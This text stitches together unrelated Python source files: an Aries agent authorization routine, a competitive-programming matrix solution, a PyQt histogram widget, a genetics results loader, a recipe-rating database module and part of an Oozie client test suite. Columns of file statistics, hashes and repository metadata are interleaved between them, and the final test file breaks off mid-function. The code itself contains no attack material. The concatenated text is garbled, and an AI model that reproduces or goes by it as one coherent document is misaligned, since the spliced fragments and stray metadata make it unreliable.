        id=pres_req_conf_id
    )


@sync_to_async
def createSession(pres_req_conf_id, presentation_request_id, presentation_request,
                  request_parameters, url):
    """Persist the AuthSession and its shortened-URL mapping (sync ORM wrapped
    for async); returns (session, mapped_url, short_url)."""
    session = AuthSession.objects.create(
        presentation_record_id=pres_req_conf_id,
        presentation_request_id=presentation_request_id,
        presentation_request=presentation_request,
        request_parameters=request_parameters,
        expired_timestamp=timezone.now() + timedelta(minutes=60),
    )
    mapped_url = MappedUrl.objects.create(url=url, session=session)
    print(mapped_url)
    short_url = mapped_url.get_short_url()
    print(short_url)
    return session, mapped_url, short_url


async def authorization_async(pres_req_conf_id: str, request_parameters: dict):
    """Async variant of authorization() driven through AriesAgentController.

    Creates the proof request, (re-)ledgers the agent endpoint after TAA
    acceptance, persists the session, and returns (short_url, session_pk,
    presentation_request_id, b64_presentation).
    """
    # Based on the aca-py agent you wish to control
    agent_controller = AriesAgentController(admin_url=settings.ACA_PY_URL)
    # Webhook server intentionally disabled for now:
    # await asyncio.gather(agent_controller.init_webhook_server(webhook_host=WEBHOOK_HOST, webhook_port=WEBHOOK_PORT, webhook_base=WEBHOOK_BASE))

    presentation_configuration = await getPresentationConfig(pres_req_conf_id)
    print('PRESENTATION CONFIG: ', presentation_configuration)

    response = await asyncio.gather(
        agent_controller.proofs.create_request(presentation_configuration.to_json()))
    response = response[0]
    print('PROOF CREATE: ', response)

    # TODO - the current DID of the Agent is already ledgered on Stagingnet
    # This creates a scenario where the endpoint being fetched is wrong
    # Need to update the code so that new DIDs can be ledgered to stagingnet
    # together with endpoints
    public_did = await asyncio.gather(agent_controller.wallet.get_public_did())
    public_did = public_did[0]['result']
    print('PUBLIC DID: ', public_did)
    endpoint = await asyncio.gather(
        agent_controller.ledger.get_did_endpoint(public_did['did']))
    endpoint = endpoint[0]['endpoint']
    print('ENDPOINT: ', endpoint)

    # TODO - this will wail due to no TAA accepted on ledger
    TAA_response = await agent_controller.ledger.get_taa()
    TAA = TAA_response['result']['taa_record']
    TAA['mechanism'] = "service_agreement"
    TAA_accept = await agent_controller.ledger.accept_taa(TAA)
    ## Will return {} if successful
    print(TAA_accept)

    # Re-ledger the transport endpoint now that the TAA is accepted, then
    # fetch it back to build the presentation request.
    await asyncio.gather(agent_controller.wallet.set_did_endpoint(
        public_did['did'], settings.ACA_PY_TRANSPORT_URL, 'Endpoint'))
    endpoint = await asyncio.gather(
        agent_controller.ledger.get_did_endpoint(public_did['did']))
    endpoint = endpoint[0]['endpoint']
    print('ENDPOINT ', endpoint)

    presentation_request = PresentationFactory.from_params(
        presentation_request=response.get("presentation_request"),
        p_id=response.get("thread_id"),
        verkey=[public_did.get("verkey")],
        endpoint=endpoint,
    ).to_json()
    print('PROOF REQUEST: ', presentation_request)
    presentation_request_id = response["presentation_exchange_id"]

    url, b64_presentation = create_short_url(presentation_request)
    print(url)
    session, mapped_url, short_url = await createSession(
        pres_req_conf_id, presentation_request_id, presentation_request,
        request_parameters, url)
    print('SESSION ', session)
    print('sessionpk: ', str(session.pk))
    print('mapped_url: ', mapped_url)
    print('short_url: ', short_url)
    print('presx_id: ', presentation_request_id)
    print('b64 presx: ', b64_presentation)

    await agent_controller.terminate()
    return short_url, str(session.pk), presentation_request_id, b64_presentation
42.7
146
0.761124
732
5,978
5.915301
0.202186
0.118476
0.053349
0.030023
0.564896
0.5
0.481986
0.469053
0.40485
0.381293
0
0.006485
0.148712
5,978
139
147
43.007194
0.84437
0.119438
0
0.423077
0
0
0.085366
0.009146
0
0
0
0.007194
0
1
0.028846
false
0
0.105769
0.009615
0.173077
0.192308
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdad84b4bff0650ac95c00b90cecccaf57a977f3
425
py
Python
BOJ17207.py
INYEONGKIM/BOJ
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
[ "MIT" ]
2
2019-03-05T15:42:46.000Z
2019-07-24T15:52:36.000Z
BOJ17207.py
INYEONGKIM/BOJ
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
[ "MIT" ]
null
null
null
BOJ17207.py
INYEONGKIM/BOJ
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
[ "MIT" ]
null
null
null
# BOJ 17207: multiply two 5x5 matrices, reverse the row-sum vector and
# report the name at the position of its minimum.

# Names in problem order; after reversing the load vector, index i of the
# reversed vector selects NAMES[i].
NAMES = ['Youngki', 'Jinwoo', 'Jungwoo', 'Junsuk', 'Inseo']


def _mat_mul5(a, b):
    """Return the 5x5 matrix product a @ b (plain nested lists of ints)."""
    return [[sum(a[i][k] * b[k][j] for k in range(5)) for j in range(5)]
            for i in range(5)]


def least_loaded(a, b):
    """Return the name with the minimum task load.

    The load vector is the per-row sum of a @ b, reversed (as the problem
    requires) before the argmin; ties resolve to the lowest index, i.e.
    the earliest name in NAMES.
    """
    product = _mat_mul5(a, b)
    task = [sum(row) for row in product][::-1]
    return NAMES[task.index(min(task))]


def _read_matrix():
    """Read a 5x5 integer matrix: five whitespace-separated lines from stdin."""
    return [[int(x) for x in input().split()] for _ in range(5)]


if __name__ == '__main__':
    # Input: matrix a (5 lines) followed by matrix b (5 lines).
    print(least_loaded(_read_matrix(), _read_matrix()))
28.333333
75
0.531765
85
425
2.635294
0.317647
0.1875
0.214286
0.098214
0.339286
0.232143
0.232143
0.232143
0
0
0
0.031884
0.188235
425
14
76
30.357143
0.617391
0
0
0.285714
0
0
0.072941
0
0
0
0
0
0
1
0
false
0
0
0
0
0.071429
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bdae540df0f84f457e5404b4e6682360e4f75f83
5,163
py
Python
psana/psana/graphqt/IVSpectrum.py
ZLLentz/lcls2
3edbea556779f619944ee9b97fb33cd815a19a37
[ "BSD-3-Clause-LBNL" ]
null
null
null
psana/psana/graphqt/IVSpectrum.py
ZLLentz/lcls2
3edbea556779f619944ee9b97fb33cd815a19a37
[ "BSD-3-Clause-LBNL" ]
null
null
null
psana/psana/graphqt/IVSpectrum.py
ZLLentz/lcls2
3edbea556779f619944ee9b97fb33cd815a19a37
[ "BSD-3-Clause-LBNL" ]
null
null
null
"""Class :py:class:`IVSpectrum` is a QWidget with histogram, two axes, and color bar ==================================================================================== Usage :: # Run test: python lcls2/psana/psana/graphqt/IVSpectrum.py from psana.graphqt.IVSpectrum import IVSpectrum w = IVSpectrum() Created on 2021-06-22 by Mikhail Dubrovin """ import logging logger = logging.getLogger(__name__) from psana.graphqt.FWViewHist import FWViewHist from psana.graphqt.FWViewAxis import FWViewAxis from psana.graphqt.FWViewColorBar import FWViewColorBar import psana.graphqt.ColorTable as ct from PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QTextEdit from PyQt5.QtCore import Qt, QRectF def test_image(): import psana.pyalgos.generic.NDArrGenerators as ag return ag.random_standard((8,12), mu=0, sigma=10) class IVSpectrum(QWidget): """QWidget for Image Viewer""" def __init__(self, **kwargs): parent = kwargs.get('parent', None) image = kwargs.get('image', test_image()) QWidget.__init__(self, parent) ctab = ct.color_table_interpolated() rs=QRectF(0, 0, 100, 1000) self.whis = FWViewHist(self, rs, origin='DR', scale_ctl='V', fgcolor='yellow', bgcolor='dark', orient='V') self.wcbar = FWViewColorBar(self, coltab=ctab, orient='V') r = self.whis.sceneRect() rscx = QRectF(r.x(), 0, r.width(), 1) rscy = QRectF(0, r.y(), 1, r.height()) self.wax = FWViewAxis(None, rscx, side='U', origin='UR', scale_ctl=True, wwidth=30, wlength=200) self.way = FWViewAxis(None, rscy, side='L', origin='DL', scale_ctl=True, wwidth=60, wlength=200) self.but_reset = QPushButton('Reset') self.edi_info = QTextEdit('Info') self.box = QGridLayout() self.box.setSpacing(0) self.box.setVerticalSpacing(0) self.box.setHorizontalSpacing(0) self.box.addWidget(self.edi_info, 0, 0, 1, 11) self.box.addWidget(self.way, 1, 10, 9, 1) self.box.addWidget(self.whis, 1, 0, 9, 10) self.box.addWidget(self.wax, 10, 0, 1, 9) self.box.addWidget(self.wcbar, 1, 9, 9, 1) self.box.addWidget(self.but_reset, 10, 9, 1, 2, 
alignment=Qt.AlignCenter) self.setLayout(self.box) self.set_tool_tips() self.set_style() self.connect_scene_rect_changed() self.but_reset.clicked.connect(self.on_but_reset) def connect_scene_rect_changed(self): self.whis.connect_scene_rect_changed_to(self.on_whis_scene_rect_changed) self.wax.connect_scene_rect_changed_to(self.on_wax_scene_rect_changed) self.way.connect_scene_rect_changed_to(self.on_way_scene_rect_changed) def disconnect_scene_rect_changed(self): self.whis.disconnect_scene_rect_changed_from(self.on_whis_scene_rect_changed) self.wax.disconnect_scene_rect_changed_from(self.on_wax_scene_rect_changed) self.way.disconnect_scene_rect_changed_from(self.on_way_scene_rect_changed) def on_but_reset(self): logger.debug('on_but_reset') if self.whis is not None: self.whis.reset_original_size() def on_whis_scene_rect_changed(self, r): #logger.debug('on_whis_scene_rect_changed: %s'%str(r)) self.wax.set_view(rs=QRectF(r.x(), 0, r.width(), 1)) self.way.set_view(rs=QRectF(0, r.y(), 1, r.height())) self.update_info() def on_wax_scene_rect_changed(self, r): #logger.debug('on_wax_scene_rect_changed: %s'%str(r)) rs = self.whis.scene().sceneRect() self.whis.set_view(rs=QRectF(r.x(), rs.y(), r.width(), rs.height())) def on_way_scene_rect_changed(self, r): #logger.debug('on_way_scene_rect_changed: %s'%str(r)) rs = self.whis.scene().sceneRect() self.whis.set_view(rs=QRectF(rs.x(), r.y(), rs.width(), r.height())) self.update_info() def update_info(self): r = self.whis.scene().sceneRect() self.edi_info.setText('Spectrum min: %d max: %d' % (r.y(), r.y()+r.height())) def set_tool_tips(self): self.whis.setToolTip('Spectrum') def set_style(self): self.layout().setContentsMargins(0,0,0,0) #self.but_reset.setFixedSize(60,30) self.wcbar.setFixedWidth(25) #self.edi_info.setFixedHeight(100) self.edi_info.setMaximumHeight(50) def set_pixmap_from_arr(self, arr, set_def=True): """shortcat to image""" self.whis.set_pixmap_from_arr(arr, set_def) def reset_original_size(self): """shortcat to 
image""" self.whis.reset_original_size() if __name__ == "__main__": import os import sys os.environ['LIBGL_ALWAYS_INDIRECT'] = '1' #export LIBGL_ALWAYS_INDIRECT=1 from PyQt5.QtWidgets import QApplication logging.basicConfig(format='[%(levelname).1s] L%(lineno)04d %(name)s : %(message)s', level=logging.DEBUG) app = QApplication(sys.argv) w = IVSpectrum() w.setGeometry(100, 50, 300, 800) w.setWindowTitle('Image with two axes') w.show() app.exec_() del w del app # EOF
32.88535
114
0.650978
723
5,163
4.432918
0.26556
0.05897
0.104836
0.062403
0.313885
0.263027
0.206864
0.127925
0.042434
0.042434
0
0.026195
0.201433
5,163
156
115
33.096154
0.751152
0.131125
0
0.065217
0
0
0.042405
0.004712
0
0
0
0
0
1
0.141304
false
0
0.119565
0
0.282609
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb6b56e79718d96881ce563456b6ed24e5bfc35
2,912
py
Python
saige/load_results.py
Nealelab/ukb_common
ee063971d48e15ea4c525d26cf6745930d7106dc
[ "MIT" ]
8
2020-03-06T12:32:44.000Z
2021-11-17T18:00:13.000Z
saige/load_results.py
Nealelab/ukb_common
ee063971d48e15ea4c525d26cf6745930d7106dc
[ "MIT" ]
1
2021-11-02T20:09:05.000Z
2021-11-03T13:10:05.000Z
saige/load_results.py
Nealelab/ukb_common
ee063971d48e15ea4c525d26cf6745930d7106dc
[ "MIT" ]
3
2020-07-27T04:14:52.000Z
2021-09-15T13:43:23.000Z
#!/usr/bin/env python3 __author__ = 'konradk' from ukb_common import * import argparse import tempfile PHENO_KEY_FIELDS = ('trait_type', 'phenocode', 'pheno_sex', 'coding', 'modifier') def main(args): hl.init(master=f'local[{args.n_threads}]', log=hl.utils.timestamp_path(os.path.join(tempfile.gettempdir(), 'load_results'), suffix='.log'), default_reference=args.reference) cases, controls = get_cases_and_controls_from_log(args.saige_run_log_format) quantitative_trait = args.trait_type in ('continuous', 'biomarkers') heritability = get_heritability_from_log(args.null_glmm_log, quantitative_trait) if args.null_glmm_log else -1.0 inv_normalized = get_inverse_normalize_status(args.null_glmm_log) if args.null_glmm_log else 'NA' saige_version = get_saige_version_from_log(args.null_glmm_log) if args.null_glmm_log else 'NA' extension = 'single.txt' if args.analysis_type == 'gene' else 'single_variant.txt' pheno_key_dict = {k: getattr(args, k) for k in PHENO_KEY_FIELDS} if args.analysis_type == 'gene': load_gene_data(args.input_dir, pheno_key_dict, args.gene_map_ht_raw_path, cases, controls, heritability, saige_version, inv_normalized, args.overwrite) load_variant_data(args.input_dir, pheno_key_dict, args.ukb_vep_ht_path, extension, cases, controls, heritability, saige_version, inv_normalized, args.overwrite, args.legacy_annotations) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input_dir', help='Input directory', required=True) parser.add_argument('--trait_type', help='Trait type', required=True) parser.add_argument('--phenocode', help='Phenotype ID', required=True) parser.add_argument('--pheno_sex', help='Phenotype sex', default='both_sexes') parser.add_argument('--coding', help='Phenotype coding', default='') parser.add_argument('--modifier', help='Phenotype modifier', default='') parser.add_argument('--null_glmm_log', help='Path to log file from null model') parser.add_argument('--saige_run_log_format', help='Path to log file from 
SAIGE test with {chr} placeholder', required=True) parser.add_argument('--analysis_type', help='Analysis type', choices=('gene', 'variant'), default='gene') parser.add_argument('--reference', help='Reference genome', default='GRCh38') parser.add_argument('--gene_map_ht_raw_path', help='Path to raw gene map') parser.add_argument('--ukb_vep_ht_path', help='Path to UKB VEP data', required=True) parser.add_argument('--n_threads', help='Number of threads to run', type=int, default=8) parser.add_argument('--legacy_annotations', help='Use old annotation picking (preferred for genotype data)', action='store_true') parser.add_argument('--overwrite', help='Overwrite everything', action='store_true') args = parser.parse_args() main(args)
56
164
0.736607
404
2,912
5.007426
0.309406
0.066733
0.12605
0.044488
0.286209
0.176965
0.131488
0.131488
0.099852
0.037568
0
0.002368
0.129808
2,912
52
165
56
0.795975
0.007212
0
0
0
0
0.260809
0.023175
0
0
0
0
0
1
0.025641
false
0
0.076923
0
0.102564
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb72defd6c6f62fdddbb438cb6348c91bc60611
4,981
py
Python
app/db/crud/recipeBewertung.py
baldur132/essensfindung
e1a8106d8a1de857340229a5fe36ca6910c55b35
[ "MIT" ]
1
2022-01-29T20:33:30.000Z
2022-01-29T20:33:30.000Z
app/db/crud/recipeBewertung.py
baldur132/essensfindung
e1a8106d8a1de857340229a5fe36ca6910c55b35
[ "MIT" ]
2
2022-03-08T06:41:22.000Z
2022-03-09T11:52:06.000Z
app/db/crud/recipeBewertung.py
baldur132/essensfindung
e1a8106d8a1de857340229a5fe36ca6910c55b35
[ "MIT" ]
6
2022-01-06T15:02:59.000Z
2022-02-02T08:08:56.000Z
"""All DB functions for the Bewertung table""" from typing import List from typing import Union import sqlalchemy from sqlalchemy.orm import Session from db.base import BewertungRecipe from db.base import Person from db.crud.user import get_user_by_mail from schemes import scheme_recipe from schemes import scheme_user from schemes.exceptions import DatabaseException from schemes.exceptions import DuplicateEntry from schemes.exceptions import UserNotFound from tools.my_logging import logger def get_bewertung_from_user_to_recipe( db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase ) -> BewertungRecipe: """Return a specific bewertung from a user to only one recipe Args: db (Session): Session to the DB user (scheme_user.UserBase): Specifie the User recipe (scheme_recipe.RecipeBase): Specifie the reciepe Returns: BewertungRecipe: Return one bewertung that match the recipe - user """ return ( db.query(BewertungRecipe) .join(Person, Person.email == BewertungRecipe.person_email) .filter(Person.email == user.email) .filter(BewertungRecipe.rezept_id == recipe.id) .first() ) def get_all_user_bewertungen(db: Session, user: scheme_user.UserBase) -> Union[List[BewertungRecipe], None]: """Return all bewertugen from one to the recipes User Args: db (Session): Session to the DB user (scheme_user.UserBase): The user to select Returns: Union[List[BewertungRecipe], None] """ user: Person = get_user_by_mail(db, user.email) if user is None: return None else: return user.bewertungenRezept def create_bewertung(db: Session, assessment: scheme_recipe.RecipeBewertungCreate) -> BewertungRecipe: """Create / Add a Bewertung to the DB. Timestamp and ID will set automatic. Args: db (Session): Session to the DB assessment (scheme_recipe.RecipeBewertungCreate): Bewertung to add. 
This include the Person and Recipe for the mapping of the Bewertung Raises: UserNotFound: If the user does not exist DuplicateEntry: Duplicate Primary Key Returns: BewertungRecipe: Return if success """ if get_user_by_mail(db, assessment.person.email) is None: raise UserNotFound(f"User {assessment.person.email} does not exist", assessment.person.email) db_assessment = BewertungRecipe( person_email=assessment.person.email, rezept_id=assessment.recipe.id, rezept_name=assessment.name, kommentar=assessment.comment, rating=assessment.rating, ) try: db.add(db_assessment) db.commit() db.refresh(db_assessment) logger.info( "Added assessment to db... recipe id:%s\temail:%s\trating:%s\tcomment:%s", db_assessment.rezept_id, db_assessment.person_email, db_assessment.rating, db_assessment.kommentar, ) return db_assessment except sqlalchemy.exc.IntegrityError as error: raise DuplicateEntry("Assessment already exist") from error def update_assessment( db: Session, old_bewertung: scheme_recipe.RecipeBewertungCreate, new_bewertung: scheme_recipe.RecipeBewertungCreate ) -> BewertungRecipe: """Update the comment and rating of a bewertung Args: db (Session): Session to the DB old_bewertung (scheme_recipe.RecipeBewertungCreate): The old Bewertung new_bewertung (scheme_recipe.RecipeBewertungCreate): The updated Bewertung Returns: BewertungRecipe: New Bewertung from `get_bewertung_from_user_to_recipe` """ rows = ( db.query(BewertungRecipe) .filter(BewertungRecipe.person_email == old_bewertung.person.email) .filter(BewertungRecipe.rezept_id == old_bewertung.recipe.id) .update({BewertungRecipe.kommentar: new_bewertung.comment, BewertungRecipe.rating: new_bewertung.rating}) ) if rows == 0: raise DatabaseException("Can not update assessment. 
Does the User and the Recipe exist?") db.commit() logger.info("Updated bewertung %s - %s", old_bewertung.person.email, old_bewertung.recipe.id) return get_bewertung_from_user_to_recipe(db, new_bewertung.person, new_bewertung.recipe) def delete_bewertung(db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase) -> int: """Delete one Bewertung Args: db (Session): Session to the db user (scheme_user.User): The owner of the Bewertung recipe (scheme_recipe.RecipeBase): The corrosponding Recipe Returns: int: Number of effected rows """ rows = ( db.query(BewertungRecipe) .filter(BewertungRecipe.person_email == user.email, BewertungRecipe.rezept_id == recipe.id) .delete() ) db.commit() logger.info("Deleted bewertung %s - %s", user.email, recipe.id) return rows
34.116438
119
0.700863
598
4,981
5.704013
0.202341
0.041923
0.024626
0.032249
0.278804
0.164761
0.147464
0.122545
0.075344
0.075344
0
0.000257
0.218229
4,981
145
120
34.351724
0.875706
0.299739
0
0.131579
0
0.013158
0.076271
0.019068
0
0
0
0
0
1
0.065789
false
0
0.171053
0
0.315789
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb88a765d8bc6b5e477b1b64ee817472716d342
66,946
py
Python
tests/pyoozie/test_client.py
Shopify/pyoozie
6dcbcb8249820dc40b5a9bbbc04b0370240fd706
[ "MIT" ]
9
2017-03-16T15:30:23.000Z
2019-08-07T03:35:59.000Z
tests/pyoozie/test_client.py
Shopify/pyoozie
6dcbcb8249820dc40b5a9bbbc04b0370240fd706
[ "MIT" ]
43
2017-02-01T22:20:52.000Z
2020-08-10T08:48:20.000Z
tests/pyoozie/test_client.py
Shopify/pyoozie
6dcbcb8249820dc40b5a9bbbc04b0370240fd706
[ "MIT" ]
5
2017-02-08T17:59:06.000Z
2020-11-12T11:29:08.000Z
# Copyright (c) 2017 "Shopify inc." All rights reserved. # Use of this source code is governed by a MIT-style license that can be found in the LICENSE file. from __future__ import unicode_literals import copy import mock import pytest import requests_mock import requests from pyoozie import exceptions from pyoozie import model from pyoozie import client from pyoozie import xml # TODO: share these with test_model.py? SAMPLE_COORD_ID = '0123456-123456789012345-oozie-oozi-C' SAMPLE_COORD_ACTION = '0123456-123456789012345-oozie-oozi-C@12' SAMPLE_WF_ID = '0123456-123456789012345-oozie-oozi-W' SAMPLE_WF_ACTION = '0123456-123456789012345-oozie-oozi-W@foo' @pytest.fixture def oozie_config(): return { 'url': 'http://localhost:11000/oozie', 'user': 'oozie', 'timeout': 30, 'verbose': False, 'launcher_memory_in_mb': '5000', 'launcher_queue': 'test.ignore', } @pytest.fixture def api(oozie_config): with mock.patch('pyoozie.client.OozieClient._test_connection'): yield client.OozieClient(**oozie_config) @pytest.fixture def api_with_session(oozie_config): with mock.patch('pyoozie.client.OozieClient._test_connection'): session = requests.Session() session.headers.update({'test-header': 'true'}) yield client.OozieClient(session=session, **oozie_config) @pytest.fixture def sample_coordinator_running(api): info = { 'coordJobId': SAMPLE_COORD_ID, 'status': 'RUNNING' } return model.Coordinator(api, info, None) @pytest.fixture def sample_coordinator_suspended(api): info = { 'coordJobId': SAMPLE_COORD_ID, 'status': 'SUSPENDED' } return model.Coordinator(api, info, None) @pytest.fixture def sample_coordinator_killed(api): info = { 'coordJobId': SAMPLE_COORD_ID, 'status': 'KILLED' } return model.Coordinator(api, info, None) @pytest.fixture def sample_coordinator_action_running(api, sample_coordinator_running): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'RUNNING' } action = model.CoordinatorAction(api, info, sample_coordinator_running) action.parent().actions = {12: action} return action 
@pytest.fixture def sample_coordinator_action_suspended(api, sample_coordinator_running): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'SUSPENDED' } action = model.CoordinatorAction(api, info, sample_coordinator_running) action.parent().actions = {12: action} return action @pytest.fixture def sample_coordinator_action_killed(api, sample_coordinator_running): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'KILLED' } action = model.CoordinatorAction(api, info, sample_coordinator_running) action.parent().actions = {12: action} return action @pytest.fixture def sample_coordinator_action_killed_with_killed_coordinator(api, sample_coordinator_killed): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'KILLED' } action = model.CoordinatorAction(api, info, sample_coordinator_killed) action.parent().actions = {12: action} return action @pytest.fixture def sample_workflow_running(api): info = { 'id': SAMPLE_WF_ID, 'status': 'RUNNING' } return model.Workflow(api, info, None) @pytest.fixture def sample_workflow_suspended(api): info = { 'id': SAMPLE_WF_ID, 'status': 'SUSPENDED' } return model.Workflow(api, info, None) @pytest.fixture def sample_workflow_killed(api): info = { 'id': SAMPLE_WF_ID, 'status': 'KILLED' } return model.Workflow(api, info, None) @pytest.fixture def sample_workflow_prep(api): info = { 'id': SAMPLE_WF_ID, 'status': 'PREP' } return model.Workflow(api, info, None) class TestOozieClientCore(object): @mock.patch('pyoozie.client.OozieClient._test_connection') def test_construction(self, mock_test_conn, oozie_config): api = client.OozieClient(**oozie_config) assert not mock_test_conn.called assert api._url == 'http://localhost:11000/oozie' assert api._session @mock.patch('pyoozie.client.OozieClient._test_connection') def test_construction_custom_session(self, mock_test_conn, oozie_config): session = requests.Session() session.auth = ('user', 'pass') api = client.OozieClient(session=session, **oozie_config) assert not mock_test_conn.called assert api._session.auth 
== session.auth def test_test_connection(self, oozie_config): with requests_mock.mock() as m: session = requests.Session() m.get('http://localhost:11000/oozie/versions', text='[0, 1, 2]') client.OozieClient(**oozie_config)._test_connection() client.OozieClient(session=session, **oozie_config)._test_connection() m.get('http://localhost:11000/oozie/versions', text='[0, 1]') with pytest.raises(exceptions.OozieException) as err: client.OozieClient(**oozie_config)._test_connection() assert 'does not support API version 2' in str(err) m.get('http://localhost:11000/oozie/versions', status_code=404) with pytest.raises(exceptions.OozieException) as err: client.OozieClient(**oozie_config)._test_connection() assert 'Unable to contact Oozie server' in str(err) m.get('http://localhost:11000/oozie/versions', text='>>> fail <<<') with pytest.raises(exceptions.OozieException) as err: client.OozieClient(**oozie_config)._test_connection() assert 'Invalid response from Oozie server' in str(err) def test_test_connection_is_called_once(self, oozie_config): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/admin/build-version', text='{}') with mock.patch('pyoozie.client.OozieClient._test_connection') as m_test: oozie_client = client.OozieClient(**oozie_config) oozie_client.admin_build_version() oozie_client.admin_build_version() m_test.assert_called_once_with() def test_request(self, api): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}') result = api._request('GET', 'endpoint', None, None) assert result['result'] == 'pass' with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint') result = api._request('GET', 'endpoint', None, None) assert result is None with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='>>> fail <<<') with pytest.raises(exceptions.OozieException) as err: api._request('GET', 'endpoint', None, None) assert 'Invalid response from 
Oozie server' in str(err) def test_request_uses_session_params(self, api_with_session): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}') result = api_with_session._request('GET', 'endpoint', None, None) assert result['result'] == 'pass' assert m.last_request.headers['test-header'] == 'true' def test_get(self, api): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}') result = api._get('endpoint') assert result['result'] == 'pass' def test_put(self, api): with requests_mock.mock() as m: headers = {'Content-Type': 'application/xml'} m.put('http://localhost:11000/oozie/v2/endpoint', request_headers=headers) result = api._put('endpoint') assert result is None def test_post(self, api): with requests_mock.mock() as m: headers = {'Content-Type': 'application/xml'} m.post('http://localhost:11000/oozie/v2/endpoint', request_headers=headers, text='{"result": "pass"}') result = api._post('endpoint', content='<xml/>') assert result['result'] == 'pass' def test_headers(self, api): headers = api._headers() assert headers == {} headers = api._headers(content_type='foo/bar') assert headers == {'Content-Type': 'foo/bar'} class TestOozieClientAdmin(object): @pytest.mark.parametrize("function, endpoint", [ ('admin_status', 'status'), ('admin_os_env', 'os-env'), ('admin_java_properties', 'java-sys-properties'), ('admin_configuration', 'configuration'), ('admin_instrumentation', 'instrumentation'), ('admin_metrics', 'metrics'), ('admin_build_version', 'build-version'), ('admin_available_timezones', 'available-timezones'), ('admin_queue_dump', 'queue-dump'), ('admin_available_oozie_servers', 'available-oozie-servers'), ]) def test_simple_admin(self, function, endpoint, api): with mock.patch.object(api, '_get', return_value=True) as mock_get: assert api.__getattribute__(function)() mock_get.assert_called_with('admin/' + endpoint) def test_admin_list_sharelib(self, api): 
reply = { 'sharelib': [ {'name': 'oozie'}, {'name': 'hive'}, {'name': 'distcp'}, {'name': 'hcatalog'}, {'name': 'sqoop'}, {'name': 'mapreduce-streaming'}, {'name': 'spark'}, {'name': 'hive2'}, {'name': 'pig'} ] } expected = ['oozie', 'hive', 'distcp', 'hcatalog', 'sqoop', 'mapreduce-streaming', 'spark', 'hive2', 'pig'] with mock.patch.object(api, '_get', return_value=reply) as mock_get: assert api.admin_list_sharelib() == expected mock_get.assert_called_with('admin/list_sharelib') def test_admin_list_all_sharelib(self, api): libs = { 'admin/list_sharelib?lib=oozie': {'sharelib': [{'files': ['oozie1', 'oozie2'], 'name': 'oozie'}]}, 'admin/list_sharelib?lib=distcp': {'sharelib': [{'files': ['distcp1', 'distcp2'], 'name': 'distcp'}]}, } expected = { 'oozie': ['oozie1', 'oozie2'], 'distcp': ['distcp1', 'distcp2'], } with mock.patch.object(api, 'admin_list_sharelib', return_value=['oozie', 'distcp']): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = lambda endpoint: libs[endpoint] result = api.admin_list_all_sharelib() assert result == expected class TestOozieClientJobsQuery(object): def test_jobs_query_workflow_parameters(self, api): mock_result = { 'total': 0, 'workflows': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Workflow) mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, user='john_doe') mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, name='my_workflow') mock_get.assert_called_with('jobs?jobtype=wf&filter=name=my_workflow&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.RUNNING) mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.running()) 
mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING;status=SUSPENDED&offset=1&len=5000') api._jobs_query( model.ArtifactType.Workflow, user='john_doe', name='my_workflow', status=model.WorkflowStatus.running()) mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe;name=my_workflow;status=RUNNING;' 'status=SUSPENDED&offset=1&len=5000') def test_jobs_query_coordinator_parameters(self, api): mock_result = { 'total': 0, 'coordinatorjobs': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Coordinator) mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000') api._jobs_query(model.ArtifactType.Coordinator, user='john_doe') mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe&offset=1&len=5000') api._jobs_query(model.ArtifactType.Coordinator, name='my_coordinator') mock_get.assert_called_with('jobs?jobtype=coordinator&filter=name=my_coordinator&offset=1&len=5000') api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.RUNNING) mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING&offset=1&len=5000') 